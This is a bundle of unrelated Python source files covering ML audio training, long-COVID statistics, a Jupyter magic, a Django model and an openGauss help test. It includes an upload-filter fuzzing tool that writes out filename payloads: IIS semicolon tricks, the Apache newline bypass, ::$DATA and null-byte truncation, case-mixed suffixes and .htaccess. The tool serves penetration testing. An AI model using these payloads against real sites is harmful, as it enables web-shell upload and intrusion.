        self.username = group_config['username'].encode('utf-8', 'ignore')
        # Optional credential fields default to the empty string.
        self.password = self._optional(group_config, 'password')
        self.enable = self._optional(group_config, 'enable')
        self.b64password = self._optional(group_config, 'b64password')
        self.b64enable = self._optional(group_config, 'b64enable')
        self.port = group_config.get('port')

    @staticmethod
    def _optional(group_config, key):
        """Return group_config[key] byte-encoded, or "" when absent/None."""
        value = group_config.get(key)
        if value is None:
            return ""
        return value.encode('utf-8', 'ignore')
|
# Copyright 2004-2008 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
"""
contains enumeration of all compilers supported by the project
"""
# Identifiers for every compiler/front-end version the project supports;
# see the module docstring above.
GCC_XML_06 = "GCC-XML 0.6"
GCC_XML_07 = "GCC-XML 0.7"
GCC_XML_09 = "GCC-XML 0.9"
GCC_XML_09_BUGGY = "GCC-XML 0.9 BUGGY"
# revision 122:
# After this fix, all constructors and destructors that exist for a class
# are dumped whether the user declared them or not. Those that were
# implicitly declared by the compiler are marked as "artificial".
MSVC_PDB_9 = "MSVC PDB 9.0"
def on_missing_functionality(compiler, functionality):
    """Raise a uniform error for a feature the given compiler backend lacks."""
    message = '"%s" compiler doesn\'t support functionality "%s"' % (compiler, functionality)
    raise NotImplementedError(message)
|
# *****************************************************************************
# Copyright (c) 2018, NVIDIA CORPORATION.
# Copyright (c) 2019, Hubert Siuzdak
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the NVIDIA CORPORATION nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# *****************************************************************************
import argparse
import json
import logging
import os
import random
import torch
from torch.utils.data import DataLoader
from loader import Loader
from model import Model
from utils import to_gpu
logging.basicConfig(level=logging.INFO)
class CrossEntropyLoss(torch.nn.Module):
    """Cross-entropy over per-sample class logits.

    Reshapes (batch, num_classes, samples) logits and (batch, samples)
    targets into the flat layout torch's CrossEntropyLoss expects:
    (batch * samples, num_classes) inputs and (batch * samples,) targets.
    """

    def __init__(self):
        super(CrossEntropyLoss, self).__init__()
        # NOTE: reads the module-level `model_config` global set in __main__.
        self.num_classes = model_config["n_out_channels"]

    def forward(self, inputs, targets):
        """Return the scalar cross-entropy loss for one batch."""
        flat_targets = targets.view(-1)
        flat_inputs = inputs.transpose(1, 2).contiguous().view(-1, self.num_classes)
        return torch.nn.CrossEntropyLoss()(flat_inputs, flat_targets)
def load_checkpoint(checkpoint_path, model, optimizer):
    """Restore model/optimizer state from a checkpoint made by save_checkpoint.

    :param checkpoint_path: path to an existing checkpoint file
    :param model: model whose parameters are overwritten in place
    :param optimizer: optimizer whose state is restored in place
    :return: (model, optimizer, iteration) where iteration is the step the
        checkpoint was written at
    """
    assert os.path.isfile(checkpoint_path)
    # NOTE(review): newer torch versions default torch.load to
    # weights_only=True, which rejects the pickled module stored under
    # 'model' — confirm against the pinned torch version.
    checkpoint_dict = torch.load(checkpoint_path, map_location='cpu')
    iteration = checkpoint_dict['iteration']
    optimizer.load_state_dict(checkpoint_dict['optimizer'])
    # The checkpoint stores a whole pickled module; only its weights are used.
    model_for_loading = checkpoint_dict['model']
    model.load_state_dict(model_for_loading.state_dict())
    print("Loaded checkpoint '{}' (iteration {})".format(checkpoint_path, iteration))
    return model, optimizer, iteration
def save_checkpoint(model, optimizer, learning_rate, iteration, filepath):
    """Write a checkpoint (pickled model copy + optimizer state) to filepath.

    A fresh Model is built from the global `model_config` and the current
    weights copied into it, so the saved module is decoupled from the live
    training instance. Requires CUDA (.cuda()).
    """
    print("Saving model and optimizer state at iteration {} to {}".format(
        iteration, filepath))
    model_for_saving = Model(model_config).cuda()
    model_for_saving.load_state_dict(model.state_dict())
    torch.save({'model': model_for_saving,
                'iteration': iteration,
                'optimizer': optimizer.state_dict(),
                'learning_rate': learning_rate}, filepath)
def cycle(iterable):
    """Yield items from *iterable* forever, re-iterating it on every pass.

    Unlike itertools.cycle, nothing is cached: each round starts a fresh
    iteration of the source, so e.g. a shuffling loader can produce a new
    order every pass.
    """
    while True:
        yield from iterable
def train(output_directory, epochs, learning_rate, alpha, iters_per_checkpoint, num_workers, batch_size, pin_memory,
          seed, checkpoint_path):
    """Main training loop: reconstruction loss plus a domain (speaker) loss.

    Reads the module-level globals ``model_config`` and ``data_config``
    set in ``__main__``. Requires CUDA. ``alpha`` is forwarded to the
    model's domain branch — presumably a gradient-reversal weight; confirm
    in Model.

    :param output_directory: checkpoint directory (created when missing)
    :param epochs: last epoch index (exclusive)
    :param learning_rate: Adam learning rate
    :param alpha: weight passed to the model alongside the decoder index
    :param iters_per_checkpoint: checkpoint every N iterations
    :param num_workers: DataLoader workers per speaker loader
    :param batch_size: per-loader batch size
    :param pin_memory: pin host memory for faster GPU transfers
    :param seed: torch RNG seed (CPU and CUDA)
    :param checkpoint_path: checkpoint to resume from, or "" to start fresh
    """
    torch.manual_seed(seed)
    torch.cuda.manual_seed(seed)
    criterion = CrossEntropyLoss()
    domain_loss_criterion = torch.nn.NLLLoss()
    model = Model(model_config).cuda()
    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
    # Load checkpoint if one exists
    iteration = 1
    if checkpoint_path != "":
        model, optimizer, iteration = load_checkpoint(checkpoint_path, model, optimizer)
        iteration += 1  # next iteration is iteration + 1
    # One dataset/loader per speaker; file lists are train_files_<i>.txt.
    train_files = ["train_files_{}.txt".format(i) for i in range(model_config["n_speakers"])]
    trainsets = [Loader(file, i, **data_config) for i, file in enumerate(train_files)]
    train_loaders = [DataLoader(trainset, num_workers=num_workers, batch_size=batch_size, shuffle=True, sampler=None,
                                pin_memory=pin_memory, drop_last=True) for trainset in trainsets]
    lengths = [len(i) for i in train_loaders]
    # Get output_directory ready
    if not os.path.isdir(output_directory):
        os.makedirs(output_directory)
        os.chmod(output_directory, 0o775)
    print("output directory", output_directory)
    model.train()
    epoch_offset = max(0, int(iteration / max(lengths))) + 1
    # Wrap each loader in an endless generator so shorter loaders keep
    # contributing batches every epoch.
    iterators = [iter(cycle(loader)) for loader in train_loaders]
    # ================ MAIN TRAINING LOOP! ===================
    reduced_recon_loss = 0.0
    reduced_domain_loss = 0.0
    for epoch in range(epoch_offset, epochs):
        print("Epoch: {}".format(epoch))
        for _ in range(max(lengths)):
            # Visit the speaker iterators in a fresh random order each step.
            random.shuffle(iterators)
            for iterator in iterators:
                model.zero_grad()
                audio, decoder_ind = next(iterator)
                audio = to_gpu(audio)
                audio_pred, domain_output = model(audio, decoder_ind[0], alpha)
                domain_loss = domain_loss_criterion(domain_output, decoder_ind.long().cuda())
                recon_loss = criterion(audio_pred, audio)
                loss = recon_loss + domain_loss
                # Accumulators feed the 100-iteration running averages below.
                reduced_recon_loss += recon_loss.item()
                reduced_domain_loss += domain_loss.item()
                loss.backward()
                optimizer.step()
                print("{}:\trecon_loss: {:.9f} \t domain_loss: {:.9f}".format(iteration, recon_loss.item(),
                                                                              domain_loss.item()))
                if (iteration % 100 == 0):
                    print("\navg_recon_loss: {:.9f}\tavg_domain_loss: {:.9f}\n".format(reduced_recon_loss / 100,
                                                                                       reduced_domain_loss / 100))
                    reduced_recon_loss = 0.0
                    reduced_domain_loss = 0.0
                if (iteration % iters_per_checkpoint == 0):
                    checkpoint_path = "{}/wavenet_{}".format(
                        output_directory, iteration)
                    save_checkpoint(model, optimizer, learning_rate, iteration,
                                    checkpoint_path)
                iteration += 1
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-c', '--config', type=str,
                        help='JSON file for configuration')
    args = parser.parse_args()
    # Parse configs. Globals nicer in this case
    with open(args.config) as f:
        data = f.read()
    config = json.loads(data)
    train_config = config["train_config"]
    # data_config / model_config are read as globals by Loader, Model,
    # CrossEntropyLoss and save_checkpoint above. (`global` at module
    # level is a no-op; kept only to signal intent.)
    global data_config
    data_config = config["data_config"]
    global model_config
    model_config = config["model_config"]
    if torch.cuda.device_count() > 1:
        print("WARNING: Multiple GPUs detected but no distributed group set")
        print("Only running 1 GPU.")
    torch.backends.cudnn.enabled = True
    # benchmark=False trades autotuned kernels for reproducibility.
    torch.backends.cudnn.benchmark = False
    train(**train_config)
|
#coding=utf-8
'''
author: c0ny1<root@gv7.me>
github: https://github.com/c0ny1/upload-fuzz-dic-builder
date: 2018-11-04 23:16
description: 生成符合漏洞实际场景fuzz字典的脚本
'''
import argparse
import copy
import urllib
## Suffixes each server-side language/parser will execute (with case
## variants to bypass naive blacklists)
html_parse_suffix = ['html','htm','phtml','pht','Html','Htm','pHtml']
asp_parse_suffix = ['asp','aspx','asa','asax','ascx','ashx','asmx','cer','aSp','aSpx','aSa','aSax','aScx','aShx','aSmx','cEr']
php_parse_suffix = ['php','php5','php4','php3','php2','pHp','pHp5','pHp4','pHp3','pHp2']
jsp_parse_suffix = ['jsp','jspa','jspx','jsw','jsv','jspf','jtml','jSp','jSpx','jSpa','jSw','jSv','jSpf','jHtml']
## Web middleware parsing vulnerabilities
def iis_suffix_creater(suffix):
    """IIS semicolon parsing-bug payloads: '<suffix>;.<allowed>'.

    Reads the module-level global ``allow_suffix`` (set in __main__).
    """
    return ['%s;.%s' % (item, allow_suffix) for item in suffix]
def apache_suffix_creater(suffix):
    """Apache payloads: an unknown trailing extension ('x.xxx', handled by
    Apache's multi-extension parsing) plus the CVE-2017-15715 trailing
    newline bypass.

    NOTE: Python 2 only — `urllib.unquote` is `urllib.parse.unquote` on
    Python 3.
    """
    res = []
    for l in suffix:
        str = '%s.xxx' % l
        res.append(str)
        str = '%s%s' % (l,urllib.unquote('%0a')) #CVE-2017-15715
        res.append(str)
    return res
# Trailing tokens Tomcat/Windows handling may strip from a stored filename.
win_tomcat = ['%20','::$DATA','/']
def tomcat_suffix_creater(suffix):
    """Append every Tomcat/Windows trailing token to each suffix."""
    return ['%s%s' % (base, token) for base in suffix for token in win_tomcat]
## Operating-system quirks
def str_81_to_ff():
    """Return the URL-decoded bytes %81–%FF as one-character strings;
    used below as trailing characters to probe Windows filename handling.

    NOTE: Python 2 only — `urllib.unquote` is `urllib.parse.unquote` on
    Python 3.
    """
    res = []
    for i in range(129,256):
        str = '%x' % i
        str = '%' + str
        str = urllib.unquote(str)
        res.append(str)
    return res
# Characters Windows may strip or normalize at the end of a file name.
windows_os = [' ','.','/','::$DATA','<','>','>>>','%20','%00'] + str_81_to_ff()
def windows_suffix_creater(suffix):
    """Combine each suffix with every Windows filename quirk in windows_os."""
    return ['%s%s' % (base, quirk) for base in suffix for quirk in windows_os]
## Script-language null-byte truncation payloads (e.g. 'x.php%00.jpg')
def str_00_truncation(suffix,allow_suffix):
    """For each suffix emit two payloads ending in the allowed suffix:
    one with a literal '%00' and one with a real NUL byte.

    NOTE: Python 2 only — `urllib.unquote` is `urllib.parse.unquote` on
    Python 3.
    """
    res = []
    for i in suffix:
        str = '%s%s.%s' % (i,'%00',allow_suffix)
        res.append(str)
        str = '%s%s.%s' % (i,urllib.unquote('%00'),allow_suffix)
        res.append(str)
    return res
## All single-run upper-case variants of a string
def str_case_mixing(word):
    """Return variants of *word* where one contiguous slice is upper-cased.

    Every (i, j) slice of the lower-cased word is upper-cased in turn; a
    dict de-duplicates colliding variants, so the output order follows the
    dict's key order (insertion order on Python 3.7+, arbitrary earlier).
    """
    str_list = []
    word = word.lower()
    tempWord = copy.deepcopy(word)
    plist = []
    redict = {}
    # Split the word into a list of single characters.
    for char in range( len( tempWord ) ):
        char = word[char]
        plist.append(char)
    num = len( plist )
    for i in range( num ):
        for j in range( i , num + 1 ):
            sContent = ''.join( plist[0:i] )
            mContent = ''.join( plist[i:j] )
            mContent = mContent.upper()
            eContent = ''.join( plist[j:] )
            content = '''%s%s%s''' % (sContent,mContent,eContent)
            # Dict keys de-duplicate variants that collide (e.g. empty slice).
            redict[content] = None
    for i in redict.keys():
        str_list.append(i)
    return str_list
## Mixed-case variants for every entry of a list
def list_case_mixing(li):
    """Expand each word in *li* into all of its case variants, concatenated."""
    return [variant for word in li for variant in str_case_mixing(word)]
## Double-suffix generation (e.g. 'pphphp' from 'php')
def str_double_suffix_creater(suffix):
    """Insert the whole suffix at every interior position of itself."""
    chars = list(suffix)
    return [''.join(chars[:i] + [suffix] + chars[i:])
            for i in range(1, len(chars))]
def list_double_suffix_creater(list_suffix):
    """Double-suffix payloads for every entry, de-duplicated."""
    collected = []
    for entry in list_suffix:
        collected.extend(str_double_suffix_creater(entry))
    return duplicate_removal(collected)
# list de-duplication (set-based: original ordering is NOT preserved)
def duplicate_removal(li):
    """Return *li* without duplicates; order follows set iteration order."""
    return list(set(li))
# list: drop empty/blank/None entries
def clear_list(li):
    """Remove '', ' ' and None entries from *li* in place and return it.

    BUGFIX: the original removed items while iterating the same list,
    which skips the element after each removal — consecutive blanks
    survived. Slice assignment keeps the in-place contract without that
    bug.
    """
    rmstr = ['', ' ', None]
    li[:] = [item for item in li if item not in rmstr]
    return li
def parse_args():
    """Build and parse the command-line options for the wordlist generator."""
    p = argparse.ArgumentParser(
        prog='upload-fuzz-dic-builder',
        formatter_class=argparse.RawTextHelpFormatter,
        description='')
    p.add_argument('-n', '--upload-filename', metavar='',
                   dest='upload_file_name', type=str, default='test',
                   help=u'Upload file name')
    p.add_argument('-a', '--allow-suffix', metavar='',
                   dest='allow_suffix', type=str, default='jpg',
                   help=u'Allowable upload suffix')
    p.add_argument('-l', '--language', metavar='', dest='language',
                   choices=['asp', 'php', 'jsp', 'all'], type=str,
                   default='all', help='Uploaded script language')
    p.add_argument('-m', '--middleware', metavar='', dest='middleware',
                   choices=['iis', 'apache', 'tomcat', 'all'], type=str,
                   default='all', help='Middleware used in Web System')
    p.add_argument('--os', metavar='', dest='os',
                   choices=['win', 'linux', 'all'], type=str, default='all',
                   help='Target operating system type')
    p.add_argument('-d', '--double-suffix', dest='double_suffix',
                   default=False, action='store_true',
                   help='Is it possible to generate double suffix?')
    p.add_argument('-o', '--output', metavar='', dest='output_filename',
                   type=str, default='upload_fuzz_dic.txt',
                   help='Output file')
    return p.parse_args()
if __name__ == '__main__':
    # NOTE: this script is Python 2 (print statements with u'' literals).
    args = parse_args()
    upload_file_name = args.upload_file_name
    allow_suffix = args.allow_suffix
    output_filename =args.output_filename
    language = args.language
    middleware = args.middleware
    os = args.os
    double_suffix =args.double_suffix
    # IIS only runs on Windows, so a Windows-only wordlist is sufficient.
    if middleware == 'iis':
        os = 'win'
    ###################################
    f = open(output_filename,'w')
    parse_suffix = []
    case_parse_suffix = []
    middleware_parse_suffix = []
    htaccess_suffix = []
    os_parse_suffix = []
    double_parse_suffix = []
    # Executable suffixes for the chosen server-side language.  The
    # html/asp/php/jsp_parse_suffix base lists are defined earlier in the
    # file; the unused ones are blanked so the combined maths below works.
    if language == 'asp':
        html_parse_suffix = []
        php_parse_suffix = []
        jsp_parse_suffix = []
        parse_suffix = asp_parse_suffix
    elif language == 'php':
        asp_parse_suffix = []
        jsp_parse_suffix = []
        parse_suffix = html_parse_suffix + php_parse_suffix
    elif language == 'jsp':
        html_parse_suffix = []
        asp_parse_suffix = []
        php_parse_suffix = []
        parse_suffix = jsp_parse_suffix
    else: # language == 'all'
        parse_suffix = html_parse_suffix + asp_parse_suffix + php_parse_suffix + jsp_parse_suffix
    print u'[+] 收集%d条可解析后缀完毕!' % len(parse_suffix)
    # Case-mixed variants (Windows filesystems are case-insensitive).
    if os == 'win' or os == 'all':
        case_html_parse_suffix = list_case_mixing(html_parse_suffix)
        case_asp_parse_suffix = list_case_mixing(asp_parse_suffix)
        case_php_parse_suffix = list_case_mixing(php_parse_suffix)
        case_jsp_parse_suffix = list_case_mixing(jsp_parse_suffix)
        case_parse_suffix = list_case_mixing(parse_suffix)
        print u'[+] 加入%d条可解析后缀大小写混合完毕!' % len(case_parse_suffix)
    else: # os == 'linux'
        case_html_parse_suffix = html_parse_suffix
        case_asp_parse_suffix = asp_parse_suffix
        case_php_parse_suffix = php_parse_suffix
        case_jsp_parse_suffix = jsp_parse_suffix
        case_parse_suffix = parse_suffix
    # Middleware (IIS/Apache/Tomcat) parsing-vulnerability payloads.
    if middleware == 'iis':
        case_asp_php_jsp_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_jsp_parse_suffix
        middleware_parse_suffix = iis_suffix_creater(case_asp_php_jsp_parse_suffix)
    elif middleware == 'apache':
        case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
        middleware_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
    elif middleware == 'tomcat' and os == 'linux':
        middleware_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
    elif middleware == 'tomcat' and (os == 'win' or os == 'all'):
        case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
        middleware_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
    else:
        # middleware == 'all': combine payloads for every middleware.
        case_asp_php_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix
        iis_parse_suffix = iis_suffix_creater(case_asp_php_parse_suffix)
        case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix
        apache_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix)
        case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix
        tomcat_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix)
        middleware_parse_suffix = iis_parse_suffix + apache_parse_suffix + tomcat_parse_suffix
        middleware_parse_suffix = duplicate_removal(middleware_parse_suffix)
    print u'[+] 加入%d条中间件漏洞完毕!' % len(middleware_parse_suffix)
    # .htaccess upload payloads (Apache only); case-mixed on Windows.
    if (middleware == 'apache' or middleware == 'all') and (os == 'win' or os == 'all'):
        htaccess_suffix = str_case_mixing(".htaccess")
        print u'[+] 加入%d条.htaccess完毕!' % len(htaccess_suffix)
    elif (middleware == 'apache' or middleware == 'all') and os == 'linux':
        htaccess_suffix = ['.htaccess']
        print u'[+] 加入1条.htaccess'
    else:
        htaccess_suffix = []
    # OS filename quirks (trailing dot/space, ::$DATA, high bytes, ...).
    if os == 'win':
        os_parse_suffix = windows_suffix_creater(case_parse_suffix)
    elif os == 'linux':
        os_parse_suffix = parse_suffix
    else:
        win_suffix = windows_suffix_creater(case_parse_suffix)
        linux_suffix = parse_suffix
        os_parse_suffix = win_suffix + linux_suffix
        os_parse_suffix = duplicate_removal(os_parse_suffix)
    print u'[+] 加入%d条系统特性完毕!' % len(os_parse_suffix)
    # Script-language %00 truncation payloads.
    language_parse_suffux = str_00_truncation(case_parse_suffix,allow_suffix)
    # Optional double-suffix payloads (already case-mixed input).
    if double_suffix:
        double_parse_suffix = list_double_suffix_creater(case_parse_suffix)
        print u'[+] 加入%d条双后缀完毕!' % len(double_parse_suffix)
    else:
        double_parse_suffix = []
    all_parse_suffix = case_parse_suffix + middleware_parse_suffix + os_parse_suffix + language_parse_suffux + double_parse_suffix
    all_parse_suffix = duplicate_removal(all_parse_suffix)
    all_parse_suffix = clear_list(all_parse_suffix)
    # Write the wordlist: "<name>.<suffix>" per line, then .htaccess entries.
    num = len(all_parse_suffix)
    for i in all_parse_suffix:
        str = '%s.%s' % (upload_file_name,i)
        #print '[+] '+type(str)
        f.write(str)
        f.write('\n')
    num += len(htaccess_suffix)
    for i in htaccess_suffix:
        f.write(i)
        f.write('\n')
    f.close()
    print u'[+] 去重后共%s条数据写入%s文件' % (num,output_filename)
|
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from common_variables import demographic_variables, clinical_variables
pd.set_option("display.max_rows", 50)
# Text results are appended here by write_to_file() below.
results_path = "output/practice_summ.txt"
# OpenSAFELY codelists that identify long-COVID coding activity.
long_covid_codelists = [
    "opensafely-nice-managing-the-long-term-effects-of-covid-19",
    "opensafely-referral-and-signposting-for-long-covid",
    "opensafely-assessment-instruments-and-outcome-measures-for-long-covid",
]
# Load each codelist CSV (indexed by SNOMED code) and stack into one frame.
combined_codelists = [
    pd.read_csv(f"codelists/{path}.csv", index_col="code")
    for path in long_covid_codelists
]
combined_codelists = pd.concat(combined_codelists)
# One study-definition column name per individual SNOMED code.
individual_code_dates = [f"snomed_{c}_date" for c in combined_codelists.index]
def crosstab(idx):
    """Cross-tabulate *idx* against the long-COVID flag.

    Returns one table with raw counts per category, a rate per 100,000
    and a column percentage.  NOTE(review): relies on the module-level
    ``df`` defined later in this file.
    """
    flag = df["long_covid"]
    counts = pd.crosstab(idx, flag, normalize=False, dropna=False)
    rate_per_100k = (
        pd.crosstab(idx, flag, normalize="index", dropna=False)[1] * 100000
    ).round(1)
    pct_of_cases = (
        pd.crosstab(idx, flag, normalize="columns", dropna=False)[1] * 100
    ).round(1)
    table = pd.concat([counts, rate_per_100k, pct_of_cases], axis=1)
    table.columns = ["No long COVID", "Long COVID", "Rate per 100,000", "%"]
    return table
def redact_small_numbers(df, column):
    """Blank out (NaN) every row whose *column* value lies in 1..5.

    Statistical disclosure control: small counts must not be published.
    Mutates *df* in place and also returns it.
    """
    small = df[column].isin(range(1, 6))
    df.loc[small, :] = np.nan
    return df
def write_to_file(text_to_write, erase=False):
    """Append *text_to_write* plus a blank line to results_path, echoing to stdout.

    When *erase* is True any existing results file is removed first.
    """
    if erase and os.path.isfile(results_path):
        os.remove(results_path)
    with open(results_path, "a") as out:
        out.write(f"{text_to_write}\n")
        print(text_to_write)
        out.write("\n")
        print("\n")
# Study population exported by the cohort extractor.
df = pd.read_stata(
    "output/input.dta",
    index_col="patient_id",
    convert_categoricals=False
)
# Find first COVID date
# Earliest of the three candidate COVID evidence dates per patient.
# NOTE(review): first_covid_date is computed but never used below — confirm.
first_covid_date = df[["sgss_positive", "primary_care_covid", "hospital_covid"]].min(
    axis=1
)
## Crosstabs
# Count comorbidity flags per patient, then cap at 2 ("2 or more").
df["comorbidities"] = df[
    [
        "diabetes",
        "cancer",
        "haem_cancer",
        "asthma",
        "chronic_respiratory_disease",
        "chronic_cardiac_disease",
        "chronic_liver_disease",
        "stroke_or_dementia",
        "other_neuro",
        "organ_transplant",
        "dysplenia",
        "ra_sle_psoriasis",
        "other_immunosup_cond",
    ]
].sum(axis=1)
df.loc[df["comorbidities"] > 2, "comorbidities"] = 2
# Variables to stratify the long-COVID crosstabs by.
stratifiers = list(demographic_variables.keys()) + [
    "bmi",
    "comorbidities",
    "mental_health",
    "asthma",
    "diabetes",
]
crosstabs = [crosstab(df[v]) for v in stratifiers]
# NOTE(review): keys has one more entry ("imd") than there are crosstab
# objects — verify this is accepted by the pandas version in use.
all_together = pd.concat(
    crosstabs, axis=0, keys=stratifiers + ["imd"], names=["Attribute", "Category"]
)
print(all_together)
# Redact small counts before exporting the table.
redact_small_numbers(all_together, "Long COVID").to_csv("output/counts_table.csv")
|
# Copyright (c) Metakernel Development Team.
# Distributed under the terms of the Modified BSD License.
from IPython.core.magic import magic_escapes
from metakernel import Magic
import os
class LSMagicMagic(Magic):
    """Magic that lists all line and cell magics known to the kernel."""

    def line_lsmagic(self):
        """
        %lsmagic - list the current line and cell magics

        This line magic will list all of the available cell and line
        magics installed in the system and in your personal magic
        folder.

        Example:
            %lsmagic
        """
        # The original also read magic_escapes['line'] / ['cell'] into
        # locals that were never used; those dead reads are removed.
        mp = self.kernel.magic_prefixes['magic']
        line_magics = self.kernel.line_magics.keys()
        cell_magics = self.kernel.cell_magics.keys()
        out = [
            'Available line magics:',
            ' '.join(sorted(mp + lm for lm in line_magics)),
            '',
            'Available cell magics:',
            # Cell magics are invoked with a doubled prefix (e.g. %%name).
            ' '.join(sorted(mp + mp + cm for cm in cell_magics)),
        ]
        self.kernel.Print('\n'.join(out))
def register_magics(kernel):
    """Entry point used by metakernel to install LSMagicMagic on *kernel*."""
    kernel.register_magics(LSMagicMagic)
|
from django.db import models
from django.contrib import admin
from rest_framework import serializers
class Team(models.Model):
    """A named team taking part in a single Event."""
    class Meta:
        verbose_name = 'Team'
    # Human-readable team name.
    name = models.CharField(max_length=255)
    # Owning event; deleting the event cascades to its teams.  'Event' is a
    # lazy string reference, so the Event model may be defined elsewhere.
    event = models.ForeignKey(
        to='Event',
        on_delete=models.CASCADE
    )
    def __str__(self):
        # Shown in the admin and wherever the model is rendered as text.
        return self.name
class TeamSerializer(serializers.ModelSerializer):
    """DRF serializer exposing a Team's name, event id and primary key."""
    class Meta:
        model = Team
        fields = ('name', 'event', 'pk')
class TeamAdmin(admin.ModelAdmin):
    """Admin list view for Team showing name, event and primary key."""
    list_display = ('name', 'event', 'pk')
# Make Team manageable through the Django admin site.
admin.site.register(Team, TeamAdmin)
|
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : 服务端工具
Case Name : gs_checkos工具显示帮助信息(正常)
Description :
1.显示帮助信息(-?)
2.显示帮助信息(--help)
Expect :
1.显示正确
2.显示正确
History :
"""
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
logger = Logger()
class Tools(unittest.TestCase):
    """Checks the gs_checkos help output produced by -? and --help."""
    def setUp(self):
        """Log the case banner and connect to the default (root) node."""
        logger.info('--------------Opengauss_Function_Tools_gs_checkos_Case0001start-------------------')
        self.rootNode = Node('default')
        self.Constant = Constant()
    def test_server_tools1(self):
        """Run gs_checkos -? / --help and validate usage, options and items."""
        logger.info('------------------显示帮助信息------------------')
        logger.info('--------------执行命令获取帮助信息--------------')
        cmd_list = ['-?', '--help']
        for cmd in cmd_list:
            check_cmd1 = f'''source {macro.DB_ENV_PATH}
            gs_checkos {cmd}'''
            logger.info(check_cmd1)
            msg1 = self.rootNode.sh(check_cmd1).result()
            logger.info(msg1)
            # Slice the output into three sections by its fixed headings.
            logger.info('--------------从Usage:开始截取msg1---------------')
            start_index1 = msg1.find('Usage:')+len('Usage:')
            start_index2 = msg1.find('General options:')
            start_index3 = msg1.find('Item number description:')+len('Item number description:')
            # Section 1: the usage/grammar lines between Usage: and
            # General options: (first and last lines are dropped as noise).
            logger.info('--------------截取语法部分---------------')
            temp1 = msg1[start_index1:start_index2].split('\n')
            options_list1 = []
            for i in temp1[1:-2]:
                options_list1.append(i.strip())
            logger.info(options_list1)
            grammar = ['gs_checkos -? | --help',
                       'gs_checkos -V | --version',
                       'gs_checkos -i ITEM [-f HOSTFILE] [-h HOSTNAME] [-X XMLFILE] [--detail] [-o OUTPUT] [-l LOGFILE]']
            if len(options_list1) == len(grammar):
                for opt in options_list1:
                    if opt in grammar:
                        logger.info(f'{opt}---------语法校验通过---------')
                    else:
                        logger.error(f'{opt}---------语法校验不通过---------')
            else:
                logger.error('---------语法校验有误---------')
            # Section 2: every token that starts with '-' in the options
            # section is treated as a supported flag.
            logger.info('--------------截取中间参数部分---------------')
            options_list2 = []
            for i in msg1[start_index2:start_index3].split('\n'):
                for j in i.split(' '):
                    if len(j) != 0:
                        if j[0] == '-':
                            options_list2.append(j)
                        else:
                            pass
                    else:
                        pass
            logger.info(options_list2)
            parameter1 = ['-i', '-f', '-h', '-X', '--detail', '-o', '-l', '-?', '--help', '-V', '--version']
            if len(options_list2) == len(parameter1):
                for opt in options_list2:
                    if opt in parameter1:
                        logger.info(f'{opt}---------参数校验通过---------')
                    else:
                        logger.error(f'{opt}---------参数校验不通过---------')
            else:
                logger.error('---------参数校验有误---------')
            # Section 3: the item-number descriptions (A1..A14, B1..B8)
            # following "Item number description:".
            logger.info('--------------截取最后面参数部分---------------')
            temp2 = msg1[start_index3:].split('\n')
            logger.info(temp2)
            options_list3 = []
            for j in temp2[1:]:
                options_list3.append(j.strip())
            logger.info(options_list3)
            parameter2 =[
                "'A1':[ OS version status ]","'A2':[ Kernel version status ]","'A3':[ Unicode status ]",
                "'A4':[ Time zone status ]","'A5':[ Swap memory status ]","'A6':[ System control parameters status ]",
                "'A7':[ File system configuration status ]","'A8':[ Disk configuration status ]",
